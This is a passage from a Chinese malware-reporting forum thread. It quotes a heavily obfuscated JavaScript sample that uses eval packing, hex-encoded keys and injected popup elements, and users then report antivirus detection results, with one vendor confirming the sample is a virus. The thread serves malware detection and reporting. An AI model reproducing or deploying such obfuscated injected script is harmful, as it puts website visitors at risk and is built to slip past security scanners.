_0x7d7ex46=document[__Oxaeb85[0x12]](__Oxaeb85[0x6e]);_0x7d7ex46[__Oxaeb85[0x7b]](__Oxaeb85[0x32],__Oxaeb85[0x7f]);if(_0x7d7ex28){_0x7d7ex46[__Oxaeb85[0x32]][__Oxaeb85[0x80]]= ((_0x7d7ex2c* _0x7d7ex27)/ 2+ _0x7d7ex2c)+ __Oxaeb85[0x81];_0x7d7ex46[__Oxaeb85[0x32]][__Oxaeb85[0x82]]= ((_0x7d7ex2d* _0x7d7ex27* 100/ 2)+ _0x7d7ex2d)+ __Oxaeb85[0x81];_0x7d7ex46[__Oxaeb85[0x32]][__Oxaeb85[0x83]]= (_0x7d7ex2c* _0x7d7ex27/ 2)+ __Oxaeb85[0x81];_0x7d7ex46[__Oxaeb85[0x32]][__Oxaeb85[0x84]]= (_0x7d7ex2d* _0x7d7ex27* 100/ 2)+ __Oxaeb85[0x81]};_0x7d7ex46[__Oxaeb85[0x7e]]= function(){_0x7d7ex43[__Oxaeb85[0x7e]]= null;_0x7d7ex41(3)};var _0x7d7ex47=_0x7d7exf(_0x7d7ex43,_0x7d7ex3);var _0x7d7ex48=_0x7d7exf(_0x7d7ex43,_0x7d7ex5);var _0x7d7ex49=_0x7d7exf(_0x7d7ex43,_0x7d7ex6);_0x7d7ex47[0x0][__Oxaeb85[0x7e]]= function(_0x7d7ex4a){_0x7d7ex41(3);_0x7d7ex4a[__Oxaeb85[0x85]]()};var _0x7d7ex4b=_0x7d7exf(_0x7d7ex43,_0x7d7ex4);var _0x7d7ex4c=function(){document[__Oxaeb85[0xd]](__Oxaeb85[0x37])[0x0][__Oxaeb85[0x36]](_0x7d7ex43);_0x7d7ex43[__Oxaeb85[0x36]](_0x7d7ex46)};_0x7d7ex4c();if(_0x7d7ex45[__Oxaeb85[0x28]](__Oxaeb85[0x74])> -1){var _0x7d7ex4d=_0x7d7ex43[__Oxaeb85[0x86]];window[__Oxaeb85[0x54]](__Oxaeb85[0x87],function(){var _0x7d7ex4e=document[__Oxaeb85[0x37]][__Oxaeb85[0x88]]|| document[__Oxaeb85[0x89]][__Oxaeb85[0x88]];_0x7d7ex43[__Oxaeb85[0x32]][__Oxaeb85[0x16]]= _0x7d7ex4e+ _0x7d7ex4d+ __Oxaeb85[0x81]})};if(_0x7d7ex29== 1){eval(function(_0x7d7ex4f,_0x7d7ex7,_0x7d7ex1d,_0x7d7ex4,_0x7d7exa,_0x7d7ex3){_0x7d7exa= function(_0x7d7ex1d){return (_0x7d7ex1d< _0x7d7ex7?__Oxaeb85[0x21]:_0x7d7exa(parseInt(_0x7d7ex1d/ _0x7d7ex7)))+ ((_0x7d7ex1d= _0x7d7ex1d% _0x7d7ex7)> 35?String[__Oxaeb85[0x2d]](_0x7d7ex1d+ 29):_0x7d7ex1d.toString(36))};if(!__Oxaeb85[0x21][__Oxaeb85[0x22]](/^/,String)){while(_0x7d7ex1d--){_0x7d7ex3[_0x7d7exa(_0x7d7ex1d)]= _0x7d7ex4[_0x7d7ex1d]|| _0x7d7exa(_0x7d7ex1d)};_0x7d7ex4= [function(_0x7d7exa){return _0x7d7ex3[_0x7d7exa]}];_0x7d7exa= function(){return __Oxaeb85[0x8e]};_0x7d7ex1d= 1};while(_0x7d7ex1d--){if(_0x7d7ex4[_0x7d7ex1d]){_0x7d7ex4f= _0x7d7ex4f[__Oxaeb85[0x22]]( new RegExp(__Oxaeb85[0x8f]+ _0x7d7exa(_0x7d7ex1d)+ __Oxaeb85[0x8f],__Oxaeb85[0x90]),_0x7d7ex4[_0x7d7ex1d])}};return _0x7d7ex4f}(__Oxaeb85[0x8a],9,9,__Oxaeb85[0x8d][__Oxaeb85[0x8c]](__Oxaeb85[0x8b]),0,{}));window[__Oxaeb85[0x54]](__Oxaeb85[0x91],function(_0x7d7exa){_0x7d7ex41(5)},false)}};hour= _0x7d7ex1[__Oxaeb85[0x9]]();if(_0x7d7ex1a()== 0&& hour> 9&& hour< 22){window[_0x7d7ex7]({'\x69\x6D\x61\x67\x65\x73':[{'\x55\x72\x6C':__Oxaeb85[0x92]}],'\x62\x74\x6E':__Oxaeb85[0x93],'\x61\x6C\x69\x6E\x6B':__Oxaeb85[0x94],'\x63\x6F\x6E\x66\x69\x67\x73':{'\x73\x68\x64\x6F\x77\x48':1.2,'\x73\x68\x64\x6F\x77\x50':0,'\x69\x73\x62\x61\x63\x6B':0,'\x64\x69\x73\x74\x61\x6E\x63\x65\x54\x6F\x70':__Oxaeb85[0x95],'\x69\x73\x43\x6C\x6F\x73\x65':0,'\x7A\x68\x69\x77\x65\x6E':__Oxaeb85[0x96],'\x78\x68':100,'\x78\x77':100}})}else {window[_0x7d7ex7]({'\x69\x6D\x61\x67\x65\x73':[{'\x55\x72\x6C':__Oxaeb85[0x92]}],'\x62\x74\x6E':__Oxaeb85[0x93],'\x61\x6C\x69\x6E\x6B':__Oxaeb85[0x94],'\x63\x6F\x6E\x66\x69\x67\x73':{'\x73\x68\x64\x6F\x77\x48':1.2,'\x73\x68\x64\x6F\x77\x50':0,'\x69\x73\x62\x61\x63\x6B':0,'\x64\x69\x73\x74\x61\x6E\x63\x65\x54\x6F\x70':__Oxaeb85[0x95],'\x69\x73\x43\x6C\x6F\x73\x65':0,'\x7A\x68\x69\x77\x65\x6E':__Oxaeb85[0x96],'\x78\x68':100,'\x78\x77':100}})}})();;;(function(_0x7d7ex8,_0x7d7ex1d,_0x7d7ex50,_0x7d7ex51,_0x7d7exf,_0x7d7ex4){_0x7d7ex4= __Oxaeb85[0x97];_0x7d7ex51= function(_0x7d7exd){if( typeof alert!== _0x7d7ex4){alert(_0x7d7exd)};if( typeof console!== _0x7d7ex4){console[__Oxaeb85[0x98]](_0x7d7exd)}};_0x7d7ex50= function(_0x7d7ex7,_0x7d7ex8){return _0x7d7ex7+ _0x7d7ex8};_0x7d7exf= _0x7d7ex50(__Oxaeb85[0x99],_0x7d7ex50(_0x7d7ex50(__Oxaeb85[0x9a],__Oxaeb85[0x9b]),__Oxaeb85[0x9c]));try{_0x7d7ex8= __encode;if(!( typeof _0x7d7ex8!== _0x7d7ex4&& _0x7d7ex8=== _0x7d7ex50(__Oxaeb85[0x9d],__Oxaeb85[0x9e]))){_0x7d7ex51(_0x7d7exf)}}catch(e){_0x7d7ex51(_0x7d7exf)}})({})

复制代码

显示全部楼层 · 发表于 2021-1-27 20:01:57

卡巴斯基不报，vt：0/60

显示全部楼层 · 发表于 2021-1-28 06:45:28

Bullguard Miss

https://www.virustotal.com/gui/f ... 9cbd13c21/detection

显示全部楼层 · 发表于 2021-1-28 06:46:35

川建国代理人发表于 2021-1-27 18:47
智量V2.72Miss
这代码。。。

Dropper吧

显示全部楼层 · 发表于 2021-1-28 08:08:44

已上报，等待结果

显示全部楼层 · 发表于 2021-1-28 11:39:37

您好, 经过再次确认, 文件确认是病毒. 感谢您的反馈~

[可疑文件] 火绒报毒

本帖子中包含更多资源

评分

评分

浏览过的版块